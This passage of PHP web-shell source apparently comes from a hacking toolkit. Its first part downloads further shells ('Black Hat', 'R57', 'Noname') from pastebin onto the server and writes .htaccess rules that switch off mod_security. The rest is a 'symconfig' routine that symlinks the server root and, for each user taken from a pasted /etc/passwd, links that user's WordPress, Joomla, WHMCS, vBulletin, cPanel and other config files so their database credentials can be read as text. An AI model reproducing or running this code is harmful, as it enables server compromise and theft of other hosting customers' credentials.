  709. $file_tools5 = "c7e_tools/bh.php";
  710. $isi_httools5 = "<IfModule mod_security.c>
  711. SecFilterEngine Off
  712. SecFilterScanPOST Off
  713. </IfModule>";
  714. $httools5 = fopen(".htaccess", "w");
  715. $tools5_script = file_get_contents("http://pastebin.com/raw.php?i=3L2ESWeu");
  716. $tools5 = fopen($file_tools5, "w");
  717. fwrite($tools5, $tools5_script);
  718. fwrite($httools5, $isi_httools5);
  719. chmod($file_tools5, 0755);
  720. echo "Done <a href='c7e_tools/bh.php'>Black Hat Shell Here</a>";
  721. }
  722. elseif($_GET['shell'] == 'r57'){
  723. $tools6_dir = mkdir('c7e_tools', 0755);
  724. $file_tools6 = "c7e_tools/r57.php";
  725. $isi_httools6 = "<IfModule mod_security.c>
  726. SecFilterEngine Off
  727. SecFilterScanPOST Off
  728. </IfModule>";
  729. $httools6 = fopen(".htaccess", "w");
  730. $tools6_script = file_get_contents("http://pastebin.com/raw.php?i=G2VEDunW");
  731. $tools6 = fopen($file_tools6, "w");
  732. fwrite($tools6, $tools6_script);
  733. fwrite($httools6, $isi_httools6);
  734. chmod($file_tools6, 0755);
  735. echo "Done <a href='c7e_tools/r57.php'>R57 Shell Here</a>";
  736. }
  737. elseif($_GET['shell'] == 'noname'){
  738. $tools7_dir = mkdir('c7e_tools', 0755);
  739. $file_tools7 = "c7e_tools/noname.php";
  740. $isi_httools7 = "<IfModule mod_security.c>
  741. SecFilterEngine Off
  742. SecFilterScanPOST Off
  743. </IfModule>";
  744. $httools7 = fopen(".htaccess", "w");
  745. $tools7_script = file_get_contents("http://pastebin.com/raw.php?i=BRCmf02c");
  746. $tools7 = fopen($file_tools7, "w");
  747. fwrite($tools7, $tools7_script);
  748. fwrite($httools7, $isi_httools7);
  749. chmod($file_tools7, 0755);
  750. echo "Done <a href='c7e_tools/noname.php'>Noname Shell Here</a>";
  751. }
  752. elseif($_GET['EnsikologyScience'] == 'symconfig') {
  753. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  754. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  755. exit;
  756. }
  757. else
  758. {
  759. if($_POST["m"] && !$_POST["passwd"]==""){
  760. @mkdir("c7e_symconf", 0777);
  761. @chdir("c7e_symconf");
  762. @symlink("/","root");
  763. $htaccess="Options Indexes FollowSymLinks
  764. DirectoryIndex c7eisjustice.htm
  765. AddType text/plain .php
  766. AddHandler text/plain .php
  767. Satisfy Any";
  768. @file_put_contents(".htaccess",$htaccess);
  769. $etc_passwd=$_POST["passwd"];
  770. $etc_passwd=explode("\n",$etc_passwd);
  771. foreach($etc_passwd as $passwd){
  772. $pawd=explode(":",$passwd);
  773. $user =$pawd[0];
  774.  
  775. @symlink('/','c7e_symconf/root');
  776. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  777. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  778. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  779. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  780. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  781. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  782. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  783. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  784. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  785. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  786. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  787. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  788. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  789. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  790. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  791. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  792. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  793. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  794. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  795. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  796. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  797. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  798. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  799. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  800. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  801. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  802. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  803. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  804. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  805. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  806. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  807. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  808. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  809. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  810. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  811. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  812. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  813. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  814. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  815. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  816. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  817. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  818. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  819. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  820. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  821. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  822. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  823. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  824. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  825. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  826. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  827. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  828. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  829. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  830. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  831. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  832. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  833. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  834. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  835. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  836. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  837. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  838. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  839. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  840. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  841. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  842. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  843. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  844. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  845. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  846. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  847. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  848. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  849. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  850. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  851. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  852. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  853. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  854. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  855. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  856. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  857. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  858. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  859. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  860. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  861. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  862. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  863. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  864. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  865. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  866. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  867. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  868. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  869. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  870. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  871. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  872. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  873. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  874. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  875. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  876. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  877. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  878. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  879. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  880. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  881. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  882. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  883. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  884. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  885. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  886. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  887. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  888. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  889. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  890. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  891. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  892. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  893. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  894. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  895. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  896. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  897. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  898. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  899. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  900. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  901. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  902. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  903. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  904. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  905. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  906. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  907. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  908. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  909. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  910. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  911. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  912. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  913. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  914. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  915. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  916. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  917. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  918. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  919. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  920. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  921. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  922. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  923. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  924. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  925. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  926. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  927. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  928. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  929. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  930. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  931. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  932. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  933. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  934. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  935. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  936. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  937. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  938. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  939. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  940. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  941. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  942. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  943. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  944. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  945. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  946. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  947. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  948. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  949. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  950. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  951. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  952. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  953. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  954. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  955. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  956. @symlink('/home/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  957. @symlink('/home/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  958.  
  959. //Home1
  960.  
  961. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  962. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  963. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  964. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  965. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  966. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  967. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  968. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  969. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  970. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  971. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  972. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  973. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  974. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  975. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  976. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  977. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  978. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  979. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  980. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  981. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  982. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  983. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  984. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  985. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  986. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  987. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  988. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  989. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  990. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  991. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  992. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  993. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  994. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  995. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  996. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  997. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  998. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  999. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1000. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1001. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1002. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1003. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1004. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1005. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1006. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1007. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1038. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1039. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1040. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1041. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1042. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1043. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1044. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1045. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1046. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1047. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1048. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1049. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1050. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1051. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1052. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1053. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1054. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1055. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1056. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1057. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1058. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1059. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1060. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1061. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1062. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
